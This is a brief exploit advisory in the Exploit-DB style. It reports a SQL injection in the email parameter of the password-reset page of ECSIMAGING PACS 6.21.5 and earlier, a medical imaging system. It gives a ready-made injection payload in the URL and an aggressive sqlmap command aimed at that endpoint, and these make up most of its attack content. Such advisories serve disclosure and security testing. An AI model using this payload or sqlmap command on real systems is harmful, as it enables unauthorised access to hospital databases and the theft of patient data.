# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux
ECSIMAGING PACS Application in 6.21.5 and bellow suffers fromSQLinjection vulnerability
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )
Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001
SQLMAP :sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5